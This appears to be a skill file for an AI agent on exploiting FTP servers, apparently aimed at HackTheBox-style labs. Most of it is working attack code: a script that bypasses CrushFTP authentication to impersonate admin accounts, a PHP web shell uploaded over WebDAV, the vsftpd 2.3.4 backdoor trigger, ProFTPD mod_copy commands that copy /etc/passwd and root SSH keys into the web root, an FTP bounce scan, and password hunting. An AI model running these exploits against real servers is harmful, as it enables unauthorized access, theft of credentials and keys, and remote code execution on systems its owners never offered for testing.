By name: FTP Server Exploitation description: | This skill should be used when FTP services are detected including: - CrushFTP (CVE-2025-31161 auth bypass) - vsftpd (backdoor) - ProFTPD (mod_copy) - Pure-FTPd, FileZilla Server Covers authentication bypass, file access, and privilege escalation. version: 1.0.0
FTP Server Exploitation Skill
Service Identification
Banner Analysis
# Nmap FTP detection
nmap -sV -sC -p 21 <TARGET>
# Manual banner grab
nc <TARGET> 21
curl ftp://<TARGET>
Common FTP Servers
| Banner Contains | Server | Notable Vulns |
|---|---|---|
| CrushFTP | CrushFTP | CVE-2025-31161 auth bypass |
| vsFTPd 2.3.4 | vsftpd | Backdoor RCE |
| ProFTPD 1.3.5 | ProFTPD | mod_copy arbitrary write |
| Pure-FTPd | Pure-FTPd | Check version for vulns |
| FileZilla | FileZilla Server | Config file disclosure |
CVE-2025-31161: CrushFTP Authentication Bypass
CRITICAL - Allows unauthenticated access to any user account
Affected Versions
- CrushFTP < 11.3.1 (v11 branch)
- CrushFTP < 10.8.4 (v10 branch)
Detection
# Look for CrushFTP web interface
curl -s http://<TARGET>/WebInterface/ | grep -i crush
# Check version in response headers
curl -sI http://<TARGET>/WebInterface/
Exploit: AWS4-HMAC-SHA256 Auth Bypass
#!/bin/bash
# CrushFTP Auth Bypass - CVE-2025-31161
TARGET="ftp.target.htb"
USER="admin" # User to impersonate (try: admin, crushadmin, root)
# Generate session cookie
timestamp=$(date +%s)
random=$(head -c 30 /dev/urandom | base64 | tr -dc a-zA-Z0-9 | head -c 30)
cookie="${timestamp}_${random}"
c2f="${cookie: -4}"
# Authenticate as any user without password
curl -s -X POST "http://${TARGET}/WebInterface/function/" \
-H "Cookie: CrushAuth=${cookie}" \
-H "Authorization: AWS4-HMAC-SHA256 Credential=${USER}/" \
-d "command=getUsername&c2f=${c2f}"
echo ""
echo "Authenticated as ${USER}"
# List users (if admin)
curl -s -X POST "http://${TARGET}/WebInterface/function/" \
-H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}" \
-d "command=getUserList&c2f=${c2f}&serverGroup=MainUsers"
# List VFS (virtual filesystem)
curl -s -X POST "http://${TARGET}/WebInterface/function/" \
-H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}" \
-d "command=getXMLListing&c2f=${c2f}&path=/"
File Upload via WebDAV
# Upload PHP shell (if VFS maps to web root)
echo '<?php system($_GET["cmd"]); ?>' | curl -s -X PUT \
"http://${TARGET}/webProd/shell.php" \
-H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}" \
--data-binary @-
# Access shell
curl "http://target.htb/shell.php?cmd=id"
Enumerate VFS Paths
# Common VFS paths to check
/webProd # Often maps to web root
/home # User home directories
/IT # IT department files
/backup # Backup files
/.ssh # SSH keys!
vsftpd 2.3.4 Backdoor
# Trigger backdoor with :) in username
nc <TARGET> 21
USER backdoored:)
PASS anything
# Connect to backdoor shell
nc <TARGET> 6200
ProFTPD mod_copy (CVE-2015-3306)
# Copy files without authentication
nc <TARGET> 21
site cpfr /etc/passwd
site cpto /var/www/html/passwd.txt
# Copy SSH key
site cpfr /root/.ssh/id_rsa
site cpto /var/www/html/id_rsa
Anonymous FTP Access
# Check anonymous login
ftp <TARGET>
# Username: anonymous
# Password: anonymous@
# Or via curl
curl ftp://anonymous:anonymous@<TARGET>/
# Download all files
wget -r ftp://anonymous:anonymous@<TARGET>/
FTP Bounce Attack
# Use FTP server to scan internal network
nmap -b anonymous:anonymous@<TARGET> 10.0.0.0/24
Post-Exploitation: Password Hunting
After gaining FTP access, search for:
# Config files
grep -r "password" /path/to/ftp/
grep -r "pass" /path/to/ftp/
grep -r "credential" /path/to/ftp/
# Common password locations
config.php
.env
web.config
settings.xml
database.yml
CrushFTP VFS to SSH Key
If CrushFTP VFS exposes /root or user home directories:
# Check for SSH keys
curl -s "http://${TARGET}/.ssh/id_rsa" \
-H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}"
# Or via API
curl -s -X POST "http://${TARGET}/WebInterface/function/" \
-H "Cookie: CrushAuth=${cookie}; currentAuth=${c2f}" \
-d "command=getXMLListing&c2f=${c2f}&path=/.ssh"